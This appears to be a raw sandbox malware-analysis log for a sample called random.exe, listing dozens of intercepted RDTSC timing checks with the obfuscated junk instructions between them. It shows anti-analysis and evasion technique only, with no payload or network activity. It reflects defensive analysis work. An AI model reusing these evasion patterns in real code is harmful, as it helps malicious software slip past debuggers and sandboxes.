Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99480E second address: 99481C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F19A4F65036h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9970EE second address: 99710E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F19A4DEDF31h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F19A4DEDF26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99710E second address: 997130 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F19A4F65036h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jc 00007F19A4F65036h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jp 00007F19A4F65036h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 997130 second address: 99713A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19A4DEDF26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99713A second address: 99713F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA980 second address: 9BA984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA984 second address: 9BA9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F19A4F65036h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F19A4F65041h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA9A1 second address: 9BA9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA9A7 second address: 9BA9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA9AB second address: 9BA9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA9AF second address: 9BA9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BA9B5 second address: 9BA9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F19A4DEDF31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD2E4 second address: 9BD2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD2EA second address: 9BD2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD2EE second address: 9BD32F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F19A4F65049h 0x0000000f jmp 00007F19A4F65043h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F19A4F65044h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD32F second address: 9BD33F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jo 00007F19A4DEDF58h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BD4D7 second address: 9BD4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D57D0 second address: 9D57DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D5954 second address: 9D5983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65046h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F19A4F65040h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D619D second address: 9D61B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F19A4DEDF2Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D61B1 second address: 9D61BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D7F9F second address: 9D7FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAA34 second address: 9DAA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jng 00007F19A4F65036h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAA44 second address: 9DAABA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19A4DEDF28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F19A4DEDF28h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov edx, esi 0x00000027 mov dx, bx 0x0000002a call 00007F19A4DEDF2Ah 0x0000002f push esi 0x00000030 mov dx, E7B9h 0x00000034 pop edx 0x00000035 pop edx 0x00000036 push 00000004h 0x00000038 adc edx, 5502DFA2h 0x0000003e call 00007F19A4DEDF29h 0x00000043 push edi 0x00000044 push ecx 0x00000045 jmp 00007F19A4DEDF30h 0x0000004a pop ecx 0x0000004b pop edi 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F19A4DEDF2Eh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAABA second address: 9DAAC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAAC1 second address: 9DAAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F19A4DEDF33h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAAE2 second address: 9DAAF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAAF0 second address: 9DAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F19A4DEDF26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAAFB second address: 9DAB10 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F19A4F65038h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DAD7C second address: 9DADF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F19A4DEDF26h 0x0000000d jg 00007F19A4DEDF26h 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 call 00007F19A4DEDF2Bh 0x0000001b xor dl, FFFFFFC7h 0x0000001e pop edx 0x0000001f push dword ptr [ebp+124657B2h] 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F19A4DEDF28h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dl, 09h 0x00000041 mov edx, 2DE98B3Eh 0x00000046 push BE0B9F86h 0x0000004b push eax 0x0000004c push edx 0x0000004d js 00007F19A4DEDF3Fh 0x00000053 jmp 00007F19A4DEDF39h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DC7D6 second address: 9DC7EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Bh 0x00000007 push esi 0x00000008 jnl 00007F19A4F65036h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080122 second address: 50801C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F19A4DEDF30h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 68D90124h 0x00000016 pushad 0x00000017 call 00007F19A4DEDF33h 0x0000001c pop esi 0x0000001d mov dx, 60ECh 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F19A4DEDF2Bh 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c mov cx, 0CABh 0x00000030 call 00007F19A4DEDF30h 0x00000035 mov ch, FAh 0x00000037 pop ebx 0x00000038 popad 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop esi 0x0000003f pushfd 0x00000040 jmp 00007F19A4DEDF2Bh 0x00000045 sub ah, FFFFFFFEh 0x00000048 jmp 00007F19A4DEDF39h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50801C8 second address: 50801CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50801CE second address: 50801D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060F56 second address: 5060F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060F5B second address: 5060FC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, 457Dh 0x0000000f mov di, cx 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F19A4DEDF2Fh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F19A4DEDF34h 0x00000021 add ch, FFFFFFB8h 0x00000024 jmp 00007F19A4DEDF2Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e movsx ebx, ax 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 pop edi 0x00000036 popad 0x00000037 popad 0x00000038 pop ebp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c mov al, 69h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 504010D second address: 504011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F6503Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 504011F second address: 5040123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040123 second address: 504016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F19A4F65047h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F19A4F65046h 0x00000015 push dword ptr [ebp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 185E6DA0h 0x00000020 movsx edi, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 504022F second address: 5040234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060888 second address: 506088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 506088E second address: 5060892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060892 second address: 50608C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F19A4F65046h 0x0000000e push eax 0x0000000f jmp 00007F19A4F6503Bh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608C4 second address: 50608CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608CA second address: 50608D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608D0 second address: 50608D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608D4 second address: 50608D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608D8 second address: 50608F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F19A4DEDF30h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50608F8 second address: 5060910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F65043h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060585 second address: 5060594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060594 second address: 50605E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 103AB46Ah 0x00000008 mov di, AD36h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F19A4F6503Ch 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F19A4F65048h 0x0000001f jmp 00007F19A4F65045h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50605E4 second address: 50605F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50605F4 second address: 506060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 506060D second address: 5060611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060611 second address: 5060617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060617 second address: 506061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 506061D second address: 5060621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5060621 second address: 5060625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5070257 second address: 507029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov ax, 02DBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 pushfd 0x00000015 jmp 00007F19A4F6503Fh 0x0000001a add ecx, 002A193Eh 0x00000020 jmp 00007F19A4F65049h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 507029C second address: 50702A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50702A2 second address: 50702A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50702A6 second address: 50702F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19A4DEDF36h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F19A4DEDF30h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F19A4DEDF37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50702F1 second address: 50702F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50702F7 second address: 50702FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0D8C second address: 50A0DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F19A4F6503Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F19A4F65046h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F19A4F65047h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0DDA second address: 50A0DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0DF2 second address: 50A0DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0DF6 second address: 50A0E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0E05 second address: 50A0E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0E09 second address: 50A0E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0E21 second address: 50A0E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19A4F65041h 0x00000009 and al, FFFFFF96h 0x0000000c jmp 00007F19A4F65041h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508049A second address: 50804C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F19A4DEDF31h 0x0000000a xor eax, 5FDE5196h 0x00000010 jmp 00007F19A4DEDF31h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50804C9 second address: 50804CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50804CF second address: 50804D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50804D3 second address: 5080508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F19A4F65042h 0x00000012 jmp 00007F19A4F65045h 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080508 second address: 508050C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508050C second address: 5080549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F19A4F6503Eh 0x0000000c sbb al, 00000048h 0x0000000f jmp 00007F19A4F6503Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F19A4F65045h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080549 second address: 508057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 call 00007F19A4DEDF33h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F19A4DEDF31h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508057D second address: 5080581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080581 second address: 5080587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080587 second address: 50805C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F19A4F65046h 0x0000000b xor ax, 9D98h 0x00000010 jmp 00007F19A4F6503Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop eax 0x00000021 mov eax, ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50805C2 second address: 50805D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50805D6 second address: 50805E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
